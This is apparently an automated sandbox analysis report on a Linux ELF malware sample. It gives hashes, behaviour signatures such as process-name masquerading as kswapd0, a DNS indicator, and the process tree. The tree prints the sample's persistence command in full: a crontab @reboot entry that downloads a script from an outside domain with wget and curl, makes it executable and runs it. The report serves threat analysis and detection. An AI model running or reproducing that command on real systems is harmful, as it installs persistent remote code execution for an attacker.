Analysis
-
max time kernel
130s -
max time network
136s -
platform
ubuntu-22.04_amd64 -
resource
ubuntu2204-amd64-20240611-en -
resource tags
arch:amd64arch:i386image:ubuntu2204-amd64-20240611-enkernel:5.15.0-105-genericlocale:en-usos:ubuntu-22.04-amd64system -
submitted
28-10-2024 02:24
Behavioral task
behavioral1
Sample
3c0eb5de2946c558159a6b6a656d463febee037c17a1f605330e601cfcd39615.elf
Resource
ubuntu2204-amd64-20240611-en
General
-
Target
3c0eb5de2946c558159a6b6a656d463febee037c17a1f605330e601cfcd39615.elf
-
Size
93KB
-
MD5
bb9275394716c60d1941432c7085ca13
-
SHA1
43f6e51ca69e70abb7d6cfd7f11f15df3fcc97cc
-
SHA256
3c0eb5de2946c558159a6b6a656d463febee037c17a1f605330e601cfcd39615
-
SHA512
047ec8451a8d35ac67c7ff26e145cfe5536d94ef1a7d280d2e70dc4c3ed7dfd1386a957e1b76f50c10429774df02964d48d50d6bb8debc2c9a3bcced833b125d
-
SSDEEP
1536:lDVOLhrwmN92XVNbMxvk2bB3n2GNR9maOY7h8RGEhXXBP:9VO9v4vbMxvkEB3VNR9u4h8RGaxP
Malware Config
Signatures
-
File and Directory Permissions Modification 1 TTPs 1 IoCs
Adversaries may modify file or directory permissions to evade defenses.
-
Renames itself 1 IoCs
Processes:
3c0eb5de2946c558159a6b6a656d463febee037c17a1f605330e601cfcd39615.elfpid process 1570 3c0eb5de2946c558159a6b6a656d463febee037c17a1f605330e601cfcd39615.elf -
Unexpected DNS network traffic destination 1 IoCs
Network traffic to other servers than the configured DNS servers was detected on the DNS port.
Processes:
description ioc Destination IP 217.160.70.42 -
Creates/modifies Cron job 1 TTPs 1 IoCs
Cron allows running tasks on a schedule, and is commonly used for malware persistence.
Processes:
crontabdescription ioc process File opened for modification /var/spool/cron/crontabs/tmp.HAq4X7 crontab -
Changes its process name 1 IoCs
Processes:
3c0eb5de2946c558159a6b6a656d463febee037c17a1f605330e601cfcd39615.elfdescription ioc pid process Changes the process name, possibly in an attempt to hide itself [kswapd0] 1570 3c0eb5de2946c558159a6b6a656d463febee037c17a1f605330e601cfcd39615.elf
Processes
-
/tmp/3c0eb5de2946c558159a6b6a656d463febee037c17a1f605330e601cfcd39615.elf/tmp/3c0eb5de2946c558159a6b6a656d463febee037c17a1f605330e601cfcd39615.elf1⤵
- Renames itself
- Changes its process name
PID:1570 -
/bin/shsh -c "(crontab -l ; echo \"@reboot cd /tmp; wget http://hailcocks.ru/wget.sh; curl --output wget.sh http://hailcocks.ru/wget.sh; chmod 777 wget.sh; ./wget.sh\") | crontab -"2⤵
- File and Directory Permissions Modification
PID:1571 -
/usr/bin/crontabcrontab -3⤵
- Creates/modifies Cron job
PID:1573
-
-
/usr/bin/crontabcrontab -l3⤵PID:1574
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
306B
MD53afbea3182e7ee7d34038d10c18b2ac4
SHA11d2168cb7cd54872f95082bb778efe16868150e5
SHA2567f6dd9d0683c71dd02243f3500f06d58969859be09dac2e3d048b0300481033b
SHA5128cc16b8c01cab818044dc49be83acf28fa7a0f5eda0b05fb87832478caccf35fd58f4b4b132b10045d9210e6287a2674f8b3002de5b78834e5f58f0922334b01